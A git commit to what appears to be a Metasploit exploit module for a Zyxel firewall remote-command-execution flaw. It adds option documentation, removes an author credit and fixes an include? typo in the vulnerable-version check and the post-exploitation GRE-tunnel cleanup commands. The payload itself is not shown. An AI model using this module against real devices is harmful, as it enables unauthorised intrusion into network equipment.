Fixed typo added Options section docs

jheysel-r7 · jheysel-r7 · commit 12b1936e16aa · 2024-06-10T07:39:24.000-07:00
diff --git a/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md b/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
@@ -24,6 +24,13 @@ Two caveats of this exploit chain were described by Jacob Baines in the followin
 This module was tested against USG Flex Version (???). To test this module you will need to acquire a hardware device
 running one of the vulnerable firmware versions listed above.
 
+## Options
+
+### WRITEABLE_DIR
+
+This indicates the location where you would like the payload and exploit stored, as well
+as serving as a location to store the various files and directories created by the exploit itself.
+The default value is `/tmp`
 
 ## Verification Steps
 
diff --git a/modules/exploits/linux/http/zyxel_parse_config_rce.rb b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -21,8 +21,7 @@ def initialize(info = {})
         },
         'Author' => [
           'SSD Secure Disclosure technical team', # discovery
-          'jheysel-r7',    # Msf module
-          'Jacob Baines',  # Testing
+          'jheysel-r7' # Msf module
         ],
         'References' => [
           [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
@@ -67,8 +66,8 @@ def check
         product = product_match[1]
         version = version_match[1]
 
-        if (product.starts_with?('USG') && product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
-           (product.starts_with?('USG') && !product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
+        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
            (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
            (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))
           return CheckCode::Appears("Product: #{product}, Version: #{version}")
@@ -94,7 +93,7 @@ def on_new_session(session)
       command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"
     end
 
-    if command_output.includes?('success')
+    if command_output.include?('success')
       print_good('The GRE interface was successfully removed.')
     else
       print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')
